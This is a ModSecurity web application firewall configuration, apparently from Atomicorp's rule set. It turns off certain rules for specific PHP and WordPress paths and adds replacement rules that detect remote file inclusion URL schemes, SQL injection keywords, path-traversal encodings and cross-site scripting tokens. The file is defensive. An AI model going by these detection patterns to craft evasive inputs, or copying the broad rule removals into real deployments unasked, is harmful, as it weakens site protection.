SecRule REQUEST_FILENAME "/free\.cgi" "phase:2,id:91402,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340018"

SecRule REQUEST_FILENAME "/plugins/wp-postratings/postratings-admin-ajax\.php" "phase:2,id:91403,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/search\.php" "phase:2,id:91404,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
SecAction "phase:2,id:91405,t:none,pass,nolog,skipAfter:END_RULES_91405"

SecRule ARGS|!ARGS:/search/|!ARGS:value|!ARGS:/query/|!ARGS:q|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340790,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/search/|!ARGS:value|!ARGS:/query/|!ARGS:q|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340791,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91405

SecRule REQUEST_FILENAME "/online/index\.php" "phase:2,id:91406,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91407,t:none,pass,nolog,skipAfter:END_RULES_91407"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340792,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340793,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91407

SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:91408,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340213"
SecAction "phase:2,id:91409,t:none,pass,nolog,skipAfter:END_RULES_91409"

SecRule ARGS|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:output "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340795,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"

SecMarker END_RULES_91409

SecRule REQUEST_FILENAME "/imageresize\.php" "phase:2,id:91410,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/taguchitest\.php" "phase:2,id:91411,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340022,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91412,t:none,pass,nolog,skipAfter:END_RULES_91412"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340797,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340798,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91412

SecRule REQUEST_FILENAME "/forums/modcp/moderate\.php" "phase:2,id:91413,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144"
SecAction "phase:2,id:91414,t:none,pass,nolog,skipAfter:END_RULES_91414"

SecRule ARGS|!ARGS:/text/|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340799,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"

SecMarker END_RULES_91414

SecRule REQUEST_FILENAME "/odp/index\.php" "phase:2,id:91415,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=380007"
SecAction "phase:2,id:91416,t:none,pass,nolog,skipAfter:END_RULES_91416"

SecRule REQUEST_URI|ARGS|REQUEST_BODY|!ARGS:c "/\w*(\x27|\’)(\x6F|o|\x4F)(\x72|r|\x52)" 	"t:none,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: SQL Inject Generic signature'"

SecMarker END_RULES_91416

SecRule REQUEST_FILENAME "/yanner\.php" "phase:2,id:91417,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/pluskernel/settings\.php" "phase:2,id:91418,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91419,t:none,pass,nolog,skipAfter:END_RULES_91419"

SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340801,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:r "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340802,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91419

SecRule REQUEST_FILENAME "/sql_error\.php" "phase:2,id:91420,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/login-register\.php" "phase:2,id:91421,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91422,t:none,pass,nolog,skipAfter:END_RULES_91422"

SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340803,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340804,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91422

SecRule REQUEST_FILENAME "/lecture\.php" "phase:2,id:91423,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91424,t:none,pass,nolog,skipAfter:END_RULES_91424"

SecRule ARGS|!ARGS:lec_rm|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:lec_doc "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340805,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:lec_rm|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:lec_doc "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340806,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91424

SecRule REQUEST_FILENAME "/response\.php" "phase:2,id:91425,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91426,t:none,pass,nolog,skipAfter:END_RULES_91426"

SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340807,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340808,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91426

SecRule REQUEST_FILENAME "/edit_css\.ph" "phase:2,id:91427,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/modules/mod_oneononechat/phpfunctions\.php" "phase:2,id:91428,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/sql/fileman2\.php" "phase:2,id:91429,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007"
SecAction "phase:2,id:91430,t:none,pass,nolog,skipAfter:END_RULES_91430"

SecRule REQUEST_URI|ARGS|!ARGS:dir|!ARGS:/txt/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:wysiwyg_input|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340810,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"

SecMarker END_RULES_91430

SecRule REQUEST_FILENAME "/wp-content/plugins/simple-popup-images/popup\.php" "phase:2,id:91431,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340026"

SecRule REQUEST_FILENAME "/design/swapimages_onmousemove\.js" "phase:2,id:91432,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/edit_image" "phase:2,id:91433,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91434,t:none,pass,nolog,skipAfter:END_RULES_91434"

SecRule ARGS|!ARGS:DirName|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/desc/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340811,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:DirName|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/desc/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340812,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91434

SecRule REQUEST_FILENAME "/server\.php" "phase:2,id:91435,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91436,t:none,pass,nolog,skipAfter:END_RULES_91436"

SecRule ARGS|!ARGS:u|!ARGS:/^p_/|!ARGS:rf|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340813,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:u|!ARGS:/^p_/|!ARGS:rf|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:aardvark_page "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,capture,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340814,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{TX.0},%{matched_var_name}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91436

SecRule REQUEST_FILENAME "/php/compress\.php" "phase:2,id:91437,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/tbl_replace\.php" "phase:2,id:91438,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"


SecRule REQUEST_FILENAME "wp-content/themes/bobv2/dax\.swf" "phase:2,id:91439,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-admin/plugin-install\.php" "phase:2,id:91440,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91441,t:none,pass,nolog,skipAfter:END_RULES_91441"

SecRule ARGS|!ARGS:s|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:/web/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340815,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:s|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:/web/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340816,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91441

SecRule REQUEST_FILENAME "/sitemap/index\.php" "phase:2,id:91442,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91443,t:none,pass,nolog,skipAfter:END_RULES_91443"

SecRule ARGS|!ARGS:errmsg  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|< ?iframe ?|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|\bon(?:abort|blur|change|click|dragdrop|event|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b|script |shell\:|window\.location)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340817,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

SecMarker END_RULES_91443

SecRule REQUEST_FILENAME "/tbl_row_action\.php" "phase:2,id:91444,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/www/delivery/lg\.php" "phase:2,id:91445,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340149"

